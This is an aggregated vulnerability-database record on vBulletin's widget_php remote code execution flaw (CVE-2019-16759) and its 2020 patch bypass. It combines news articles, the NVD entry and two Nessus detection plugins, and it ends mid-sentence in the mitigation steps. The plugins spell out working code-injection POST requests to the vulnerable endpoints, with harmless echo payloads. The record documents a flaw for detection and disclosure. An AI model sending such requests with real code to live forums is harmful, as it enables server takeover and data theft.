{"lastseen": "2020-08-11T16:34:26", "references": [], "description": "[](<https://thehackernews.com/images/-avcE0-MsDpE/XzKfvb9seAI/AAAAAAAA3LA/z6zYA7G0SpYPCBYnwueCw64DYdEBO5kWgCLcBGAsYHQ/s728-e100/vBulletin-zero-day-exploit.jpg>)\n\nA security researcher earlier today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability affecting the widely used internet forum software **vBulletin** that's already under active exploitation in the wild. \n \nvBulletin is a widely used proprietary Internet forum software package based on PHP and MySQL database server that powers over 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. \n \nIn September last year, a separate anonymous security researcher publicly disclosed a then-zero-day [RCE vulnerability in vBulletin](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), identified as **CVE-2019-16759**, and received a critical severity rating of 9.8, allowing attackers to execute malicious commands on the remote server without requiring any authentication to log into the forum. \n\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\n \nA day after the disclosure of CVE-2019-16759, the vBulletin team released [security patches](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch>) that resolved the issue, but it turns out that the patch was insufficient in blocking the exploitation of the flaw. \n \n\n\n## Bypassing the Patch for the CVE-2019-16759 RCE Flaw\n\n \nThe newly released zero-day, discovered, and [publicly published](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>) by security researcher Amir Etemadieh (Zenofex), is a bypass for CVE-2019-16759. The flaw did not receive any CVE identifier at the time this blog post was published. \n \nThe latest zero-day [vulnerability](<https://twitter.com/h4x0r_dz/status/1292759555034828800>) should be viewed as a severe issue because it is remotely exploitable and doesn't require authentication. It can easily be exploited using an exploit code of a single one-line command that can result in remote code execution in the latest vBulletin software. \n \n\n\n[](<https://thehackernews.com/images/-NRDjCxAfxNM/XzKePwkgs1I/AAAAAAAA3K4/52jN7EldbhU9z9MyL06SM4E_qaag6zeiACLcBGAsYHQ/s728-e100/vulnerability.jpg>)\n\n \nAccording to the researcher, the patch for CVE-2019-16759 did not resolve the issues present in the \"widget_tabbedcontainer_tab_panel\" template, i.e., its ability to load a user-controlled child template and to load the child template, it takes a value from a separately named value and places it into a variable named \"widgetConfig,\" effectively allowing the researcher to bypass the patch for CVE-2019-16759. \n\n\n \nThe researcher also published three proofs-of-concept exploit payloads written in multiple languages, including Bash, Python, and Ruby. \n \n\n\n## Hackers Actively Exploiting vBulletin Zero-Day\n\n \nSoon after the release of the PoC exploit code, hackers started exploiting the zero-day to [target vBulletin sites](<https://gist.github.com/Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b>). \n \nAccording to DefCon and Black Hat security conferences creator Jeff Moss, the DefCon forum was also attacked with the exploit just 3 hours after the flaw was disclosed. \n \n\"A new VBulletin Zero Day got dropped yesterday by @Zenofex that revealed the CVE-2019-16759 patch was incomplete - within three hours https://forum.defcon.org was attacked, but we were ready for it. Disable PHP rendering to protect yourself until patched!,\" said [Moss](<https://twitter.com/thedarktangent/status/1292813958332596224>). \n \n\n\n## Official vBulletin Patch and Mitigations\n\n \nThe vBulletin team responded to the publicly released zero-day flaw immediately and released a new security patch that disables the PHP module in vBulletin software to address the issue, assuring its users that it will be removed entirely in the future release of vBulletin 5.6.4. \n\n\n \nThe forum maintainers advised developers to consider all older versions of vBulletin vulnerable and upgrade their sites to run vBulletin 5.6.2 as soon as possible. Developers can check Quick Overview: [Upgrading vBulletin Connect](<https://forum.vbulletin.com/node/4391346/>) in the support forums for more information on upgrading. \n \nThough The Hacker News strongly advise users and developers to upgrade their forums to the new vBulletin version, those who can not update immediately can mitigate the new zero-day by disabling PHP widgets within your forums, to do this: \n \n \n\n\n * Go to the vBulletin administrator control panel and click \"Settings\" in the menu on the left, then \"Options\" in the dropdown.\n * Choose \"General Settings\" and then click \"Edit Settings.\" \n * Look for \"Disable PHP, Static HTML, and Ad Module rendering,\" Set to \"Yes.\" \n * Click \"Save\"\n \n \nNote that these changes could break some functionality but will mitigate the issue until you plan to apply the official security patches. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "reporter": "The Hacker News", "published": "2020-08-11T13:40:00", "type": "thn", "title": "A New vBulletin 0-Day RCE Vulnerability and Exploit Disclosed Publicly", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-16759"]}, {"type": "nessus", "idList": ["VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL", "VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7"]}, {"type": "zdt", "idList": ["1337DAY-ID-34826", "1337DAY-ID-34823", "1337DAY-ID-33300", "1337DAY-ID-33648"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142932"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155633", "PACKETSTORM:158866", "PACKETSTORM:154623", "PACKETSTORM:154648", "PACKETSTORM:158829", "PACKETSTORM:158830"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2"]}, {"type": "canvas", "idList": ["VBULLETIN_WIDGET_RCE"]}, {"type": "thn", "idList": ["THN:DA6A48C093F31D7EE1BB90D7EE577177", "THN:86C3930A6E4C818EFA5133059C21FA57", "THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_WIDGETCONFIG_RCE", "MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_WIDGET_TEMPLATE_RCE"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47437"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}], "modified": "2020-08-11T16:34:26", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-08-11T16:34:26", "rev": 2}, "vulnersScore": 6.3}, "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T14:36:46", "id": "THN:7EC88D1EE2BF2C54F23228C61EC1A5B0", "href": "https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html", "viewCount": 67, "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}

{"cve": [{"lastseen": "2020-09-21T14:54:52", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-24T22:15:00", "title": "CVE-2019-16759", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-19T18:58:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.5.4"], "id": "CVE-2019-16759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16759", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.5.4:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2020-08-20T13:52:06", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the\najax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for\nCVE-2019-16759.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-08-10T00:00:00", "title": "vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-17496", "CVE-2019-16759"], "modified": "2020-08-10T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139457", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139457);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/19\");\n\n script_cve_id(\"CVE-2019-16759\", \"CVE-2020-17496\");\n\n script_name(english:\"vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)\");\n script_summary(english:\"Tries to run some php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an input-validation flaw in the\najax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for\nCVE-2019-16759.\");\n # https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62dedb88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP widgets or contact the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17496\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_tabbedcontainer_tab_panel';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo(\\'crc32(\"Nessus\")=\\'.crc32(\\'Nessus\\'));',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\n# CRC32('Nessus') is 1631274700\nif ('1631274700' >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));\n\nreport =\n 'Nessus was able to verify the issue using the following request :\\n\\n' +\n http_last_sent_request() + '\\n\\n' +\n 'The above request resulted in the following output :\\n\\n' +\n res[2] + '\\n\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:31:14", "description": "The version of vBulletin running on the remote host is affected by an\ninput-validation flaw in the 'widgetConfig' parameter to the script\n'ajax/render/widget_php' that allows command execution.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-10-23T00:00:00", "title": "vBulletin 'widget_php' Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-16759"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/130168", "sourceData": "# \n# (C) Tenable Network Security, Inc. \n# \n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(130168);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/12/17\");\n\n script_cve_id(\"CVE-2019-16759\");\n\n script_name(english:\"vBulletin 'widget_php' Command Execution\");\n script_summary(english:\"Tries to execute commands.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a\ncommand execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an\ninput-validation flaw in the 'widgetConfig' parameter to the script\n'ajax/render/widget_php' that allows command execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vBulletin 5.5.4 P1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-16759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin widgetConfig RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_php';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'widgetConfig[code]=echo pi();',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\nif (\"3.14159265358\" >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"vBulletin\", build_url(port:port,qs:dir));\n\npi_pos = stridx(res[2], \"3.14159265358\");\nres_proof = substr(res[2], pi_pos - 100, pi_pos + 100);\n\nreport = get_vuln_report(\n items:http_last_sent_request(),\n port:port,\n trailer:'\\n' +\n 'The above request resulted in the following output :' +\n '\\n\\n' +\n res_proof\n);\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-09-09T22:43:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "A critical remote code execution (RCE) bug affecting default 5.x versions of vBulletin (CVE-2019-16759) is being actively exploited in the wild, allowing unauthenticated attackers to take control of web hosts.\n\nA zero-day proof-of-concept code was [anonymously published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on Monday, ahead of vBulletin issuing a patch. Also, Tenable vice president of intelligence Gavin Millard said via email that there is now a script to [leverage Shodan](<https://github.com/Frint0/mass-pwn-vbulletin>) and mass identify thousands of vulnerable systems.\n\n## Bug Details\n\nA successful exploit would allow an attacker to take control of a site using vBulletin, a popular platform for powering online forums and communities.\n\nAccording to Sucuri researcher Marc-Alexandre Montpas, the bug is caused by a flaw in vBulletin\u2019s PHP widgets, which are rendered at runtime and used to create dynamic widgets without having to directly access the hosting server.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe researcher found a way to force the site to render arbitrary widgets using the ajax/render/widget_php route,\u201d he explained in [a blog post](<https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html>) this week. \u201cSince the evalCode callback does exactly what you think it does, essentially running eval on the code it is fed, this makes it possible to run arbitrary code on the underlying server.\u201d\n\nTenable Research [analysis showed](<https://www.tenable.com/blog/critical-zero-day-pre-authentication-remote-code-execution-exploit-published-for-5-x-versions>) that an unauthenticated attacker can exploit the issue by sending a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands.\n\n\u201cThese commands would be executed with the permissions of the user account that the vBulletin service is utilizing,\u201d said Tenable researcher Ryan Seguin, in the analysis. \u201cDepending on the service user\u2019s permissions, this could allow complete control of a host\u2026.the published exploit code returns its successful execution in a JSON formatted response.\u201d\n\nThe fix is for versions 5.5.2, 5.5.3 and 5.5.4; users on earlier versions of vBulletin 5.x will need to update to one of the currently supported versions in order to apply the patch. The fix has also been applied to the cloud version of the platform.\n\nAdministrators should apply the patch as soon as possible.\n\nMontpas warned, \u201cThis vulnerability is extremely severe. It allows any website visitors to run PHP code and shell commands on the site\u2019s underlying server. As if it wasn\u2019t bad enough, this bug doesn\u2019t require the attacker to have any kind of privilege to conduct a successful attack. vBulletin\u2019s default settings also make the vulnerable endpoint accessible by default.\u201d\n\n## Attacks in the Wild\n\nSucuri and Tenable telemetry has identified a rash of attacks already taking place in the wild, just days after the PoC was dropped on Securelist.\n\n\u201cThe payload attackers are using is very interesting: It essentially modifies the vulnerable snippet by adding a password validation,\u201d Montpas noted. \u201cThis is a way for attackers to maintain access to sites they\u2019ve hacked for themselves, as well as lock out other potential hackers from getting in. From this point, the bad actor can use his newly acquired site to do other malicious things in the future.\u201d\n\nTo find out if a site has been compromised, the researcher said to look for \u201cajax/render/widget_php\u201d in the access logs. That\u2019s because some of the parameters used in the attacks can be located on POST requests, which wouldn\u2019t leave any traces in the logs.\n\nMike Bittner, associate director of Digital Security and Operations at The Media Trust, said that it was just a matter of time before bad actors fixed their crosshairs on forums, which are rich storehouses of user information.\n\n\u201cThe argument that many of today\u2019s sites do not collect users\u2019 information betrays a very uninformed notion of how websites work,\u201d he said via email. \u201cMost, if not all, of today\u2019s websites are built using a vendor\u2019s platform. If you\u2019re a small business, you probably don\u2019t have the time or the money to build your own platform. If you\u2019re a medium-sized or large organization, you don\u2019t have the time or money to build a platform with all the bells and whistles users have come to expect. Forums are just one example. Unfortunately, vendors that supply these features too often collect information on users without site owners\u2019 authorization, while failing to equip their products with the needed security and privacy protections, leaving website owners to fend for themselves and shoulder the blame for any data breaches involving their sites. In an environment where bad actors are always looking out for vulnerabilities they can exploit or well-intentioned products like vBulletin they can abuse, site owners will need to close the security gaps themselves\u2013ideally by carefully vetting their vendors and ensuring those vendors observe digital policies.\u201d\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-09-26T17:45:03", "published": "2019-09-26T17:45:03", "id": "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7", "href": "https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/", "type": "threatpost", "title": "Rash of Exploits Targets Critical vBulletin RCE Bug", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-10T12:10:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "Hackers have stolen the account details of 250,000 users of Dutch sex-work forum Hookers.nl \u2013 including email addresses of both escorts and customers.\n\nThe website provides a forum for escorts and customers to discuss sex work \u2014 including clients discussing their experiences with sex workers. A moderator on the forum said [on Thursday](<https://www.hookers.nl/forum/hookers-hang-out/over-ons/bugs-andere-foutjes/2811760-datalek-hookers-nl>) that a hacker gained access to personal details through a recently disclosed software vulnerability in an external software supplier of the website, vBulletin, which powers the forum.\n\nThe hacker was able to exploit the flaw to access a Hookers.nl user database, which includes the email addresses, usernames, hashed passwords and IP addresses of forum users. In some cases, email addresses and usernames could include users\u2019 full names.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA data breach has occurred and the email addresses have been stolen from all users,\u201d said the forum moderator. \u201cPlease note the passwords. These email addresses have been offered for sale online by hackers. Offering this information for sale is punishable by law and if possible we will take legal action against this or that. In addition, a report has been made to the Dutch Data Protection Authority.\u201d\n\nA [news outlet](<https://nos.nl/artikel/2305470-e-mailadressen-bezoekers-prostitutieforum-uitgelekt-en-te-koop-aangeboden.html>), Dutch Broadcast Foundation, who was in contact with the hacker, viewed the database and confirmed its legitimacy. The outlet reported that the hacker is selling the database for just $300. According to the news outlet, the hacker has not yet sold the data \u2013 but expects it will sell.\n\nThe [vBulletin vulnerability](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) in question ([CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>)), which allows remote command-execution, was disclosed last week. Though vBulletin has released patches for the flaw, exploit code was released on Sept. 23 \u2013 and many websites have not yet updated.\n\nThat has been seen through the active exploit of several websites, including a data breach impacting Comodo (as recently announced last week on [Comodo\u2019s forum](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>)).\n\nThe sensitive nature of the content on Hookers.nl could make the data ripe for the blackmail of affected users \u2013 both for clients and for the prostitutes actively using the forum, Chris Morales, head of security analytics at Vectra, told Threatpost.\n\n\u201cvBulletin is used for internet forums of every interest, from cooking, cars and to computers,\u201d he said. \u201cNormally an account used on a bulletin board does not contain a huge amount of information on the user, or at least it shouldn\u2019t. I wouldn\u2019t consider a public forum software compromise to be a high-risk issue. I think the nature of this bulletin board, a focus on sex workers, does change that sensitivity. That is quite exposing considering the conversations and that it reveals who the sex workers are.\u201d\n\nThe incident is reminiscent of a [2015 breach of Ashley Madison](<https://threatpost.com/password-cracking-crew-cracks-11m-ashley-madison-passwords/114625/>), an adultery hook-up website that resulted in hackers making away with names, emails, home addresses, credit card data and sexual fantasy information of all of its customers.\n\n\u201cAction has been taken as quickly as possible,\u201d according to the forum moderator. \u201cvBulletin has released a software patch that we have implemented after testing to address the leak.\u201d\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-10-10T20:37:40", "published": "2019-10-10T20:37:40", "id": "THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "href": "https://threatpost.com/vbulletin-flaw-dutch-sex-work-forum-breach/149100/", "type": "threatpost", "title": "vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-24T21:46:22", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "A security researcher has published proof-of-concept code to outsmart a patch issued last year for a zero-day vulnerability discovered in vBulletin, a popular software for building online community forums.\n\nCalling a patch for the flaw a \u201cfail\u201d and \u201cinadequate in blocking exploitation,\u201d Austin-based security researcher Amir Etemadieh published details and examples of exploit code on three developer platforms\u2013 Bash, Python and Ruby\u2013for the patch in a post published [Sunday night](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>).\n\nOn September 23, 2019, an unidentified security researcher released [exploit code](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) for a flaw that allowed for PHP remote code execution in vBulletin 5.0 through 5.4, Etemadieh wrote.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nThe zero-day, [CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>), is called a pre-auth RCE bug, which can allow an attacker to run malicious code and take over forums without needing to authenticate on the sites that are under attack.\n\n\u201cThis bug (CVE-2019-16759) was labeled as a \u2018bugdoor\u2019 because of its simplicity by a [popular vulnerability broker](<https://twitter.com/cbekrar/status/1176803541047861249?>) and was marked with a [CVSS 3.x score of 9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>) giving it a critical rating,\u201d he said in the post.\n\nA patch was issued two days later, Sept. 25, 2019, that \u201cseemed, at the time, to fix the proof of concept exploit provided by the un-named finder,\u201d Etemadieh said.\n\nIt appears that it didn\u2019t however, as Etemadieh outlined how it can be bypassed on the three developer platforms in three separate proof-of-concepts.\n\nThe key problem with the patch issued for the zero day is related to how the vBulletin template system is structured and how it uses PHP, he wrote in the post.\n\n\u201cTemplates aren\u2019t actually written in PHP but instead are written in a language that is first processed by the template engine and then is output as a string of PHP code that is later ran through an eval() during the \u2018rendering\u2019 process,\u201d according to the post. \u201cTemplates are also not a standalone item but can be nested within other templates, in that one template can have a number of child templates embedded within.\u201d\n\nThe patch is \u201cshort-sighted\u201d because it faces problems when encountering a user-controlled child template, Etemadieh wrote. In this case, a parent template will be checked to verify that the routestring does not end with a widget_php route, Etemadieh said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/11080636/vbulletin-site.png>)\u201cHowever we are still prevented from providing a payload within the widgetConfig value because of code within the rendering process, which cleans the widgetConfig value prior to the templates execution,\u201d he wrote in his post.\n\nEtemadieh goes on to show how another template that appears in the patch is \u201ca perfect assistant in bypassing the previous CVE-2019-16759 patch\u201d thanks to two key features: the template\u2019s ability to load a user-controlled child template, and how it loads the child template by taking a value from a separately named value and placing it into a variable named \u201cwidgetConfig.\u201d\n\n\u201cThese two characteristics of the \u2018widget_tabbedcontainer_tab_panel\u2019 template allow us to effectively bypass all filtering previously done to prevent CVE-2019-16759 from being exploited,\u201d he wrote.\n\nIt\u2019s unclear if Etemadieh informed vBulletin before posting the workarounds; however, a [report](<https://www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/>) in ZDNet suggests that he did not. No matter, he did provide a quick fix for his bypass of the patch in his post, showing how to disable PHP widgets within vBulletin forums that \u201cmay break some functionality but will keep you safe from attacks until a patch is released by vBulletin,\u201d he wrote.\n\nTo apply the fix, administrators should:\n\n 1. Go to the vBulletin administrator control panel.\n 2. Click \u201cSettings\u201d in the menu on the left, then \u201cOptions\u201d in the dropdown.\n 3. Choose \u201cGeneral Settings\u201d and then click \u201cEdit Settings\u201d\n 4. Look for \u201cDisable PHP, Static HTML, and Ad Module rendering\u201d, Set to 